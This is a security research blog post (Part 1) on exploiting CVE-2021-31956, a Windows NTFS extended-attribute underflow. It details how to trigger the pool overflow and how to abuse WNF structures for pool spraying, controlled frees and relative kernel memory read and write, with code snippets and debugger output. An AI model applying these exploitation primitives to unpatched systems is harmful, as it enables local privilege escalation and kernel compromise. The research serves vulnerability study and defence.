NCC Group Research

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

15 July 2021 at 12:07

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes that many versions of Windows are affected and that the issue has been exploited in the wild in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Facility (WNF) being used by the in-the-wild attackers to enable novel exploit primitives. This led to further investigation into how WNF could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective, and finally how WNF can be abused to obtain a number of exploit primitives. The series will also cover the exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, let's assume the following: there are two extended attributes within the extended attributes for the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So, assuming out_buf_length is 30 for this example, the check 18 <= 30 - 0 passes and the data would be copied into the buffer.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario where the out_buf_length is 18 and we have the following setup.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

On the first iteration of the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 61

The resulting check will be:

ea_block_size <= out_buf_length - padding

61 <= 0 - 2

At this point the check has underflowed: out_buf_length and padding are unsigned 32-bit values, so 0 - 2 wraps around to 0xFFFFFFFE rather than going negative. The check therefore passes and 61 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers of NtfsCommonQueryEa, we can see that the NtQueryEaFile system call path triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled-size allocation in kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described above.

In order to trigger the underflow, we need to set our output buffer size to be the length of the first Ea Block.

Provided that padding is required to align the allocation, the second Ea Block will be written out of bounds of the buffer when it is queried.

The interesting aspects of this vulnerability from an attacker's perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is whether this can be exploited reliably in the presence of modern kernel pool mitigations, and whether this is a “good” memory corruption from an exploitation standpoint.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies offsets 0 to 18 within the buffer.

There is then the padding of length 2, with the second extended attribute starting at offset 20.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that the NextEntryOffset of the first EA block is set to the offset of the overflowing EA block, including the padding (20). For the overflowing EA block, the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed to NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will be copied with an attacker-controlled size.

So in summary: once the extended attributes have been written to the file using NtSetEaFile, it is then necessary to trigger the vulnerable code path to act on them, by setting the output buffer size to be exactly the same size as our first extended attribute when calling NtQueryEaFile.

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows; however, not very much on recent versions of Windows 10 (19H1 and up). There have been significant changes, bringing userland Segment Heap concepts into the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this, which also proposes some initial techniques. Had this paper not already been published, exploitation of this issue would have been significantly harder.

Firstly, the important thing is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine which of the four segment heap “backends” the chunk lives on:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value of 0x12 from above, ending up with a vulnerable chunk of size 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation being below 0x200, meaning it falls within the LFH backend.

We can step through the corruption of the adjacent chunk by setting a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk, and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true; however, it demonstrates that even tighter attacker constraints can often be worked around, and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

This is followed by the 0x12 bytes of the data itself.

This means the chunk size calculation is 0x12 + 0x10 = 0x22, which is then rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows paged pool manipulation than on the non-paged pool, and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facility is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF-related structures are used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into the non-paged pool and the session pool; however, less from a paged pool perspective. As this overflow occurs within the paged pool, we need to find exploit primitives allocated within this pool.

After some reversing of WNF, it was determined that the majority of allocations used within this feature come from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

This is pointed at by the _WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the argument Length is our v6 value, with 0x10 bytes added for the _WNF_STATE_DATA header which is prepended to the data.

Therefore, we have a 0x10-byte _POOL_HEADER as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function, we can use a conditional breakpoint:

bp nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with chunks of both a controlled size and controlled contents, so we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this: NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData, which in turn ends up freeing our allocation.

Whilst researching this area, I was able to reuse the freed chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists; in my empirical testing, I did not seem to hit them after a large spray of Wnf chunks.

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data itself? Can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize denotes the size of the actual data following the structure within memory, and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that both the vulnerable NTFS chunk and the WNF chunk can be positioned next to other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. The following shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point it’s worth noting that the relative write has not really given us anything more than we already had with the NTFS overflow. However, as the data can be both read and written back using this technique, it opens up the ability to read data, modify certain parts of it and write it back.

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, and this wrong assumption led me to try to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is freed using our controlled free, we can force the chunk's address to be stored within the wrong lookaside list for its size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
